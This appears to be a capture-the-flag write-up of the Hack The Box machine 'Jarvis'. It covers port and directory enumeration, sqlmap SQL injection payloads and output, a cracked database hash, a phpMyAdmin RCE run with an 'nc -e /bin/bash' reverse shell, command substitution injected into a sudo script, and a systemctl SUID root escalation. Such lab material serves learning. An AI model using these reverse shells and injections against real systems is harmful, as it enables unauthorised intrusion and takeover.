- Published on
HTB Jarvis
- Authors
- Name
- collinhacks
- @collinhacks
Jarvis
Enumeration
nmap find all ports
nmap -p- -Pn $IP -o full-enumerate.nmap
nmap -p- -Pn $IP -o full-enumerate.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-23 20:16 EDT
Nmap scan report for 10.10.10.143
Host is up (0.031s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
64999/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 9.64 seconds
~/Tools/COLLINHACKS/Lab/nmap-awk.sh full-enumerate.nmap
cat ports.nmap
nmap check UDP
sudo nmap -sU --top-ports 1000 -v $IP -o udp.nmap
nmap all identified ports + default scripts & service versions
nmap -p <1,2,3> -A --script default --script http-methods --script http-headers $IP -o identified-ports.nmap
nmap -p 22,80,64999 -A --script http-methods --script http-headers -Pn $IP -o identified-ports.nmap 130 ⨯
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-23 20:33 EDT
Nmap scan report for 10.10.10.143
Host is up (0.028s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
| http-headers:
| Date: Tue, 24 Oct 2023 00:33:27 GMT
| Server: Apache/2.4.25 (Debian)
| Set-Cookie: PHPSESSID=v901skl4n4508s6050ln3g4082; path=/
| Expires: Thu, 19 Nov 1981 08:52:00 GMT
| Cache-Control: no-store, no-cache, must-revalidate
| Pragma: no-cache
| IronWAF: 2.0.3
| Connection: close
| Content-Type: text/html; charset=UTF-8
|
|_ (Request type: HEAD)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
64999/tcp open http Apache httpd 2.4.25 ((Debian))
| http-headers:
| Date: Tue, 24 Oct 2023 00:33:27 GMT
| Server: Apache/2.4.25 (Debian)
| Last-Modified: Mon, 04 Mar 2019 02:10:40 GMT
| ETag: "36-5833b43634c39"
| Accept-Ranges: bytes
| Content-Length: 54
| IronWAF: 2.0.3
| Connection: close
| Content-Type: text/html
|
|_ (Request type: HEAD)
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.25 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.48 seconds
nmap vuln scan
nmap -p <1,2,3> --script vuln $IP -o vuln.nmap
nmap -p 22,80,64999 --script vuln -Pn $IP -o vuln.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-23 20:36 EDT
Nmap scan report for supersecurehotel.htb (10.10.10.143)
Host is up (0.033s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.0.1
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-enum:
|_ /phpmyadmin/: phpMyAdmin
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
64999/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 31.42 seconds
Port Enumeration
**Port 80
@logger.htb
http://10.10.10.143/phpmyadmin
- ^_^
built with
fuzz dir
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u "http://supersecurehotel.htb/FUZZ" -e .php /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://supersecurehotel.htb/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt :: Extensions : .php :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________ # license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 20ms] .php [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 34ms] images [Status: 301, Size: 329, Words: 20, Lines: 10, Duration: 42ms] # This work is licensed under the Creative Commons [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 55ms] # Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 56ms] # Copyright 2007 James Fisher [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 57ms] index.php [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 65ms] # [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 71ms] # on atleast 2 different hosts [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 73ms] #.php [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 74ms] #.php [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 74ms] # [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 73ms] #.php [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 75ms] # Suite 300, San Francisco, California, 94105, USA..php [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 80ms] #.php [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 84ms] # [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 85ms] # or send a letter to Creative Commons, 171 Second Street, .php [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 90ms] # or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 90ms] # This work is licensed under the Creative Commons .php [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 90ms] # Copyright 2007 James Fisher.php [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 91ms] # directory-list-2.3-medium.txt.php [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 91ms] # Attribution-Share Alike 3.0 License. To view a copy of this .php [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 93ms] # on atleast 2 different hosts.php [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 93ms] # directory-list-2.3-medium.txt [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 92ms] # [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 90ms] # Priority ordered case sensative list, where entries were found [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 93ms] # Priority ordered case sensative list, where entries were found .php [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 94ms] [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 94ms] # license, visit http://creativecommons.org/licenses/by-sa/3.0/ .php [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 103ms] # Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 107ms] nav.php [Status: 200, Size: 1333, Words: 76, Lines: 44, Duration: 23ms] footer.php [Status: 200, Size: 2237, Words: 101, Lines: 69, Duration: 37ms] css [Status: 301, Size: 326, Words: 20, Lines: 10, Duration: 18ms] js [Status: 301, Size: 325, Words: 20, Lines: 10, Duration: 24ms] fonts [Status: 301, Size: 328, Words: 20, Lines: 10, Duration: 22ms] phpmyadmin [Status: 301, Size: 333, Words: 20, Lines: 10, Duration: 20ms] connection.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 25ms] room.php [Status: 302, Size: 3024, Words: 181, Lines: 102, Duration: 33ms] [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 27ms] .php [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 32ms] sass [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 19ms] server-status [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 26ms] :: Progress: [441120/441120] :: Job [1/1] :: 1785 req/sec :: Duration: [0:04:11] :: Errors: 0 ::fuzz files
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files.txt -u "http://supersecurehotel.htb/FUZZ" /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://supersecurehotel.htb/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________ index.php [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 29ms] footer.php [Status: 200, Size: 2237, Words: 101, Lines: 69, Duration: 21ms] .htaccess [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 18ms] . [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 25ms] .html [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 30ms] .php [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 29ms] .htpasswd [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 18ms] .htm [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 28ms] .htpasswds [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 20ms] nav.php [Status: 200, Size: 1333, Words: 76, Lines: 44, Duration: 30ms] connection.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 30ms] .htgroup [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 20ms] wp-forum.phps [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 21ms] .htaccess.bak [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 19ms] .htuser [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 28ms] .htc [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 22ms] .ht [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 23ms] .htaccess.old [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 23ms] .htacess [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 25ms] :: Progress: [37050/37050] :: Job [1/1] :: 1680 req/sec :: Duration: [0:00:23] :: Errors: 1 ::
SQLi
http://10.10.10.143/room.php?cod=1
=1'SQL injection ?put into SQLmap
sqlmap -r request --risk 3 --level 3 --tables^
└─$ sqlmap -r request --risk 3 --level 3 --tables ___ __H__ ___ ___[(]_____ ___ ___ {1.7.10#stable} |_ -| . [)] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 21:57:41 /2023-10-23/ [21:57:41] [INFO] parsing HTTP request from 'request' [21:57:41] [INFO] resuming back-end DBMS 'mysql' [21:57:41] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: cod (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cod=1 AND 2494=2494 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: cod=1 AND (SELECT 3456 FROM (SELECT(SLEEP(5)))oHpZ) Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: cod=-2866 UNION ALL SELECT CONCAT(0x7178706b71,0x456779655073744455536f5365526d565478554e45614e5449427856726f6452656b6d446c766644,0x7170786271),NULL,NULL,NULL,NULL,NULL,NULL-- - --- [21:57:41] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 9 (stretch) web application technology: Apache 2.4.25 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [21:57:41] [INFO] fetching database names [21:57:42] [INFO] retrieved: 'hotel' [21:57:42] [INFO] retrieved: 'information_schema' [21:57:42] [INFO] retrieved: 'mysql' [21:57:42] [INFO] retrieved: 'performance_schema' [21:57:42] [INFO] fetching tables for databases: 'hotel, information_schema, mysql, performance_schema' [21:57:42] [INFO] retrieved: 'hotel','room' [21:57:42] [INFO] retrieved: 'information_schema','ALL_PLUGINS' [21:57:42] [INFO] retrieved: 'information_schema','APPLICABLE_ROLES' [21:57:43] [INFO] retrieved: 'information_schema','CHARACTER_SETS' [21:57:43] [INFO] retrieved: 'information_schema','COLLATIONS' [21:57:43] [INFO] retrieved: 'information_schema','COLLATION_CHARACTER_SET_APPLICABILITY' [21:57:43] [INFO] retrieved: 'information_schema','COLUMNS' [21:57:43] [INFO] retrieved: 'information_schema','COLUMN_PRIVILEGES' [21:57:43] [INFO] retrieved: 'information_schema','ENABLED_ROLES' [21:57:43] [INFO] retrieved: 'information_schema','ENGINES' [21:57:43] [INFO] retrieved: 'information_schema','EVENTS' [21:57:43] [INFO] retrieved: 'information_schema','FILES' [21:57:43] [INFO] retrieved: 'information_schema','GLOBAL_STATUS' [21:57:43] [INFO] retrieved: 'information_schema','GLOBAL_VARIABLES' [21:57:43] [INFO] retrieved: 'information_schema','KEY_CACHES' [21:57:43] [INFO] retrieved: 'information_schema','KEY_COLUMN_USAGE' [21:57:43] [INFO] retrieved: 'information_schema','PARAMETERS' [21:57:43] [INFO] retrieved: 'information_schema','PARTITIONS' [21:57:43] [INFO] retrieved: 'information_schema','PLUGINS' [21:57:43] [INFO] retrieved: 'information_schema','PROCESSLIST' [21:57:43] [INFO] retrieved: 'information_schema','PROFILING' [21:57:44] [INFO] retrieved: 'information_schema','REFERENTIAL_CONSTRAINTS' [21:57:44] [INFO] retrieved: 'information_schema','ROUTINES' [21:57:44] [INFO] retrieved: 'information_schema','SCHEMATA' [21:57:44] [INFO] retrieved: 'information_schema','SCHEMA_PRIVILEGES' [21:57:44] [INFO] retrieved: 'information_schema','SESSION_STATUS' [21:57:44] [INFO] retrieved: 'information_schema','SESSION_VARIABLES' [21:57:44] [INFO] retrieved: 'information_schema','STATISTICS' [21:57:44] [INFO] retrieved: 'information_schema','SYSTEM_VARIABLES' [21:57:44] [INFO] retrieved: 'information_schema','TABLES' [21:57:44] [INFO] retrieved: 'information_schema','TABLESPACES' [21:57:44] [INFO] retrieved: 'information_schema','TABLE_CONSTRAINTS' [21:57:44] [INFO] retrieved: 'information_schema','TABLE_PRIVILEGES' [21:57:44] [INFO] retrieved: 'information_schema','TRIGGERS' [21:57:44] [INFO] retrieved: 'information_schema','USER_PRIVILEGES' [21:57:44] [INFO] retrieved: 'information_schema','VIEWS' [21:57:44] [INFO] retrieved: 'information_schema','GEOMETRY_COLUMNS' [21:57:44] [INFO] retrieved: 'information_schema','SPATIAL_REF_SYS' [21:57:45] [INFO] retrieved: 'information_schema','CLIENT_STATISTICS' [21:57:45] [INFO] retrieved: 'information_schema','INDEX_STATISTICS' [21:57:45] [INFO] retrieved: 'information_schema','INNODB_SYS_DATAFILES' [21:57:45] [INFO] retrieved: 'information_schema','TABLE_STATISTICS' [21:57:45] [INFO] retrieved: 'information_schema','INNODB_SYS_TABLESTATS' [21:57:45] [INFO] retrieved: 'information_schema','USER_STATISTICS' [21:57:45] [INFO] retrieved: 'information_schema','INNODB_SYS_INDEXES' [21:57:45] [INFO] retrieved: 'information_schema','XTRADB_RSEG' [21:57:45] [INFO] retrieved: 'information_schema','INNODB_CMP_PER_INDEX' [21:57:45] [INFO] retrieved: 'information_schema','INNODB_TRX' [21:57:45] [INFO] retrieved: 'information_schema','CHANGED_PAGE_BITMAPS' [21:57:45] [INFO] retrieved: 'information_schema','INNODB_FT_BEING_DELETED' [21:57:45] [INFO] retrieved: 'information_schema','INNODB_LOCK_WAITS' [21:57:45] [INFO] retrieved: 'information_schema','INNODB_LOCKS' [21:57:45] [INFO] retrieved: 'information_schema','INNODB_TABLESPACES_ENCRYPTION' [21:57:45] [INFO] retrieved: 'information_schema','XTRADB_INTERNAL_HASH_TABLES' [21:57:46] [INFO] retrieved: 'information_schema','INNODB_SYS_FIELDS' [21:57:46] [INFO] retrieved: 'information_schema','INNODB_CMPMEM_RESET' [21:57:46] [INFO] retrieved: 'information_schema','INNODB_CMP' [21:57:46] [INFO] retrieved: 'information_schema','INNODB_FT_INDEX_TABLE' [21:57:46] [INFO] retrieved: 'information_schema','INNODB_SYS_TABLESPACES' [21:57:46] [INFO] retrieved: 'information_schema','INNODB_MUTEXES' [21:57:46] [INFO] retrieved: 'information_schema','INNODB_BUFFER_PAGE_LRU' [21:57:46] [INFO] retrieved: 'information_schema','INNODB_SYS_FOREIGN_COLS' [21:57:46] [INFO] retrieved: 'information_schema','INNODB_CMP_RESET' [21:57:46] [INFO] retrieved: 'information_schema','INNODB_BUFFER_POOL_STATS' [21:57:46] [INFO] retrieved: 'information_schema','INNODB_FT_INDEX_CACHE' [21:57:46] [INFO] retrieved: 'information_schema','INNODB_SYS_FOREIGN' [21:57:46] [INFO] retrieved: 'information_schema','INNODB_METRICS' [21:57:46] [INFO] retrieved: 'information_schema','INNODB_FT_DEFAULT_STOPWORD' [21:57:46] [INFO] retrieved: 'information_schema','INNODB_CMPMEM' [21:57:46] [INFO] retrieved: 'information_schema','INNODB_SYS_TABLES' [21:57:46] [INFO] retrieved: 'information_schema','INNODB_SYS_COLUMNS' [21:57:47] [INFO] retrieved: 'information_schema','INNODB_FT_CONFIG' [21:57:47] [INFO] retrieved: 'information_schema','INNODB_BUFFER_PAGE' [21:57:47] [INFO] retrieved: 'information_schema','INNODB_CMP_PER_INDEX_RESET' [21:57:47] [INFO] retrieved: 'information_schema','XTRADB_READ_VIEW' [21:57:47] [INFO] retrieved: 'information_schema','INNODB_SYS_SEMAPHORE_WAITS' [21:57:47] [INFO] retrieved: 'information_schema','INNODB_CHANGED_PAGES' [21:57:47] [INFO] retrieved: 'information_schema','INNODB_FT_DELETED' [21:57:47] [INFO] retrieved: 'information_schema','INNODB_TABLESPACES_SCRUBBING' [21:57:47] [INFO] retrieved: 'mysql','column_stats' [21:57:47] [INFO] retrieved: 'mysql','columns_priv' [21:57:47] [INFO] retrieved: 'mysql','db' [21:57:47] [INFO] retrieved: 'mysql','event' [21:57:47] [INFO] retrieved: 'mysql','func' [21:57:47] [INFO] retrieved: 'mysql','general_log' [21:57:47] [INFO] retrieved: 'mysql','gtid_slave_pos' [21:57:47] [INFO] retrieved: 'mysql','help_category' [21:57:47] [INFO] retrieved: 'mysql','help_keyword' [21:57:48] [INFO] retrieved: 'mysql','help_relation' [21:57:48] [INFO] retrieved: 'mysql','help_topic' [21:57:48] [INFO] retrieved: 'mysql','host' [21:57:48] [INFO] retrieved: 'mysql','index_stats' [21:57:48] [INFO] retrieved: 'mysql','innodb_index_stats' [21:57:48] [INFO] retrieved: 'mysql','innodb_table_stats' [21:57:48] [INFO] retrieved: 'mysql','plugin' [21:57:48] [INFO] retrieved: 'mysql','proc' [21:57:48] [INFO] retrieved: 'mysql','procs_priv' [21:57:48] [INFO] retrieved: 'mysql','proxies_priv' [21:57:48] [INFO] retrieved: 'mysql','roles_mapping' [21:57:48] [INFO] retrieved: 'mysql','servers' [21:57:48] [INFO] retrieved: 'mysql','slow_log' [21:57:48] [INFO] retrieved: 'mysql','table_stats' [21:57:48] [INFO] retrieved: 'mysql','tables_priv' [21:57:49] [INFO] retrieved: 'mysql','time_zone' [21:57:49] [INFO] retrieved: 'mysql','time_zone_leap_second' [21:57:49] [INFO] retrieved: 'mysql','time_zone_name' [21:57:49] [INFO] retrieved: 'mysql','time_zone_transition' [21:57:49] [INFO] retrieved: 'mysql','time_zone_transition_type' [21:57:49] [INFO] retrieved: 'mysql','user' [21:57:49] [INFO] retrieved: 'performance_schema','accounts' [21:57:49] [INFO] retrieved: 'performance_schema','cond_instances' [21:57:49] [INFO] retrieved: 'performance_schema','events_stages_current' [21:57:49] [INFO] retrieved: 'performance_schema','events_stages_history' [21:57:49] [INFO] retrieved: 'performance_schema','events_stages_history_long' [21:57:49] [INFO] retrieved: 'performance_schema','events_stages_summary_by_account_by_event_name' [21:57:49] [INFO] retrieved: 'performance_schema','events_stages_summary_by_host_by_event_name' [21:57:49] [INFO] retrieved: 'performance_schema','events_stages_summary_by_thread_by_event_name' [21:57:49] [INFO] retrieved: 'performance_schema','events_stages_summary_by_user_by_event_name' [21:57:49] [INFO] retrieved: 'performance_schema','events_stages_summary_global_by_event_name' [21:57:50] [INFO] retrieved: 'performance_schema','events_statements_current' [21:57:50] [INFO] retrieved: 'performance_schema','events_statements_history' [21:57:50] [INFO] retrieved: 'performance_schema','events_statements_history_long' [21:57:50] [INFO] retrieved: 'performance_schema','events_statements_summary_by_account_by_event_name' [21:57:50] [INFO] retrieved: 'performance_schema','events_statements_summary_by_digest' [21:57:50] [INFO] retrieved: 'performance_schema','events_statements_summary_by_host_by_event_name' [21:57:50] [INFO] retrieved: 'performance_schema','events_statements_summary_by_thread_by_event_name' [21:57:50] [INFO] retrieved: 'performance_schema','events_statements_summary_by_user_by_event_name' [21:57:50] [INFO] retrieved: 'performance_schema','events_statements_summary_global_by_event_name' [21:57:50] [INFO] retrieved: 'performance_schema','events_waits_current' [21:57:50] [INFO] retrieved: 'performance_schema','events_waits_history' [21:57:50] [INFO] retrieved: 'performance_schema','events_waits_history_long' [21:57:50] [INFO] retrieved: 'performance_schema','events_waits_summary_by_account_by_event_name' [21:57:50] [INFO] retrieved: 'performance_schema','events_waits_summary_by_host_by_event_name' [21:57:50] [INFO] retrieved: 'performance_schema','events_waits_summary_by_instance' [21:57:50] [INFO] retrieved: 'performance_schema','events_waits_summary_by_thread_by_event_name' [21:57:51] [INFO] retrieved: 'performance_schema','events_waits_summary_by_user_by_event_name' [21:57:51] [INFO] retrieved: 'performance_schema','events_waits_summary_global_by_event_name' [21:57:51] [INFO] retrieved: 'performance_schema','file_instances' [21:57:51] [INFO] retrieved: 'performance_schema','file_summary_by_event_name' [21:57:51] [INFO] retrieved: 'performance_schema','file_summary_by_instance' [21:57:51] [INFO] retrieved: 'performance_schema','host_cache' [21:57:51] [INFO] retrieved: 'performance_schema','hosts' [21:57:51] [INFO] retrieved: 'performance_schema','mutex_instances' [21:57:51] [INFO] retrieved: 'performance_schema','objects_summary_global_by_type' [21:57:51] [INFO] retrieved: 'performance_schema','performance_timers' [21:57:51] [INFO] retrieved: 'performance_schema','rwlock_instances' [21:57:51] [INFO] retrieved: 'performance_schema','session_account_connect_attrs' [21:57:51] [INFO] retrieved: 'performance_schema','session_connect_attrs' [21:57:51] [INFO] retrieved: 'performance_schema','setup_actors' [21:57:51] [INFO] retrieved: 'performance_schema','setup_consumers' [21:57:52] [INFO] retrieved: 'performance_schema','setup_instruments' [21:57:52] [INFO] retrieved: 'performance_schema','setup_objects' [21:57:52] [INFO] retrieved: 'performance_schema','setup_timers' [21:57:52] [INFO] retrieved: 'performance_schema','socket_instances' [21:57:52] [INFO] retrieved: 'performance_schema','socket_summary_by_event_name' [21:57:52] [INFO] retrieved: 'performance_schema','socket_summary_by_instance' [21:57:52] [INFO] retrieved: 'performance_schema','table_io_waits_summary_by_index_usage' [21:57:52] [INFO] retrieved: 'performance_schema','table_io_waits_summary_by_table' [21:57:52] [INFO] retrieved: 'performance_schema','table_lock_waits_summary_by_table' [21:57:52] [INFO] retrieved: 'performance_schema','threads' [21:57:52] [INFO] retrieved: 'performance_schema','users' Database: hotel [1 table] +----------------------------------------------------+ | room | +----------------------------------------------------+ Database: information_schema [78 tables] +----------------------------------------------------+ | ALL_PLUGINS | | APPLICABLE_ROLES | | CHANGED_PAGE_BITMAPS | | CHARACTER_SETS | | CLIENT_STATISTICS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMN_PRIVILEGES | | ENABLED_ROLES | | FILES | | GEOMETRY_COLUMNS | | GLOBAL_STATUS | | GLOBAL_VARIABLES | | INDEX_STATISTICS | | INNODB_BUFFER_PAGE | | INNODB_BUFFER_PAGE_LRU | | INNODB_BUFFER_POOL_STATS | | INNODB_CHANGED_PAGES | | INNODB_CMP | | INNODB_CMPMEM | | INNODB_CMPMEM_RESET | | INNODB_CMP_PER_INDEX | | INNODB_CMP_PER_INDEX_RESET | | INNODB_CMP_RESET | | INNODB_FT_BEING_DELETED | | INNODB_FT_CONFIG | | INNODB_FT_DEFAULT_STOPWORD | | INNODB_FT_DELETED | | INNODB_FT_INDEX_CACHE | | INNODB_FT_INDEX_TABLE | | INNODB_LOCKS | | INNODB_LOCK_WAITS | | INNODB_METRICS | | INNODB_MUTEXES | | INNODB_SYS_COLUMNS | | INNODB_SYS_DATAFILES | | INNODB_SYS_FIELDS | | INNODB_SYS_FOREIGN | | INNODB_SYS_FOREIGN_COLS | | INNODB_SYS_INDEXES | | INNODB_SYS_SEMAPHORE_WAITS | | INNODB_SYS_TABLES | | INNODB_SYS_TABLESPACES | | INNODB_SYS_TABLESTATS | | INNODB_TABLESPACES_ENCRYPTION | | INNODB_TABLESPACES_SCRUBBING | | INNODB_TRX | | KEY_CACHES | | KEY_COLUMN_USAGE | | PARAMETERS | | PROFILING | | REFERENTIAL_CONSTRAINTS | | ROUTINES | | SCHEMATA | | SCHEMA_PRIVILEGES | | SESSION_STATUS | | SESSION_VARIABLES | | SPATIAL_REF_SYS | | STATISTICS | | SYSTEM_VARIABLES | | TABLESPACES | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TABLE_STATISTICS | | USER_PRIVILEGES | | USER_STATISTICS | | VIEWS | | XTRADB_INTERNAL_HASH_TABLES | | XTRADB_READ_VIEW | | XTRADB_RSEG | | COLUMNS | | ENGINES | | EVENTS | | PARTITIONS | | PLUGINS | | PROCESSLIST | | TABLES | | TRIGGERS | +----------------------------------------------------+ Database: mysql [30 tables] +----------------------------------------------------+ | event | | host | | plugin | | user | | column_stats | | columns_priv | | db | | func | | general_log | | gtid_slave_pos | | help_category | | help_keyword | | help_relation | | help_topic | | index_stats | | innodb_index_stats | | innodb_table_stats | | proc | | procs_priv | | proxies_priv | | roles_mapping | | servers | | slow_log | | table_stats | | tables_priv | | time_zone | | time_zone_leap_second | | time_zone_name | | time_zone_transition | | time_zone_transition_type | +----------------------------------------------------+ Database: performance_schema [52 tables] +----------------------------------------------------+ | hosts | | accounts | | cond_instances | | events_stages_current | | events_stages_history | | events_stages_history_long | | events_stages_summary_by_account_by_event_name | | events_stages_summary_by_host_by_event_name | | events_stages_summary_by_thread_by_event_name | | events_stages_summary_by_user_by_event_name | | events_stages_summary_global_by_event_name | | events_statements_current | | events_statements_history | | events_statements_history_long | | events_statements_summary_by_account_by_event_name | | events_statements_summary_by_digest | | events_statements_summary_by_host_by_event_name | | events_statements_summary_by_thread_by_event_name | | events_statements_summary_by_user_by_event_name | | events_statements_summary_global_by_event_name | | events_waits_current | | events_waits_history | | events_waits_history_long | | events_waits_summary_by_account_by_event_name | | events_waits_summary_by_host_by_event_name | | events_waits_summary_by_instance | | events_waits_summary_by_thread_by_event_name | | events_waits_summary_by_user_by_event_name | | events_waits_summary_global_by_event_name | | file_instances | | file_summary_by_event_name | | file_summary_by_instance | | host_cache | | mutex_instances | | objects_summary_global_by_type | | performance_timers | | rwlock_instances | | session_account_connect_attrs | | session_connect_attrs | | setup_actors | | setup_consumers | | setup_instruments | | setup_objects | | setup_timers | | socket_instances | | socket_summary_by_event_name | | socket_summary_by_instance | | table_io_waits_summary_by_index_usage | | table_io_waits_summary_by_table | | table_lock_waits_summary_by_table | | threads | | users | +----------------------------------------------------+
sqlmap -r request --risk 3 --level 3 -D mysql --dumpDBadmin:2D2B7A5E4E637B8FBA1D17F40318F277D29964D0- We need to find an endpoint for this login
********Port 64999
This is possibly our point of entry. The web app didn’t have too much going on, and
/phpmyadmingave me this same response. So likely this endpoint has something to do with/phpmyadmin, or vise versa. Also, in ournmapit said it acceptsOPTIONS HEAD GET POST.
Seems like I’m not actually banned from this endpoint it just says that.
Exploitation
**********Port x
Foothold
- We have login credentials found from SQLi which can be used at a login page found here http://10.10.10.143/phpmyadmin/
DBadmin:2D2B7A5E4E637B8FBA1D17F40318F277D29964D0- Password was a hash, its
imissyou
- Password was a hash, its
phpMyAdmin → Shell
- Googled
phpmyadmin 4.8.0 exploitpython3 exp.py 10.10.10.143 80 /phpmyadmin DBadmin imissyou whoami
python3 exp.py 10.10.10.143 80 /phpmyadmin DBadmin imissyou 'nc -e /bin/bash 10.10.16.2 9001'9001
Root
linpeas
Seems like this is www-data's point of interest
- Investigating the file it just pings some host, I can’t edit the file, so I have to get it to execute something as
sudo, likely a self-created reverse shell, and call it throughsimpler.py
sudo -l sudo file executing a reverse shell
echo -e '#!/bin/bash\n\nnc -e /bin/bash 10.10.16.2 9002' > /tmp/ch.shchmod +x /tmp/ch.shsudo -u pepper /var/www/Admin-Utilities/simpler.py -p$(/tmp/ch.sh)
pepper → root
linpeas
systemctl SUID
cd ~nano root.service
systemctl link root.serviceLocal =
nc -lvnp 9003systemctl start root
Useful resource links
Lessons Learned
- Practiced SQLi and RCE
- Exploited a different form of
sudo -lwhere I made a bash file executable, and then called that file from within thesimpler.pyscript that was being ran assudo - Learned SUID of systemctl
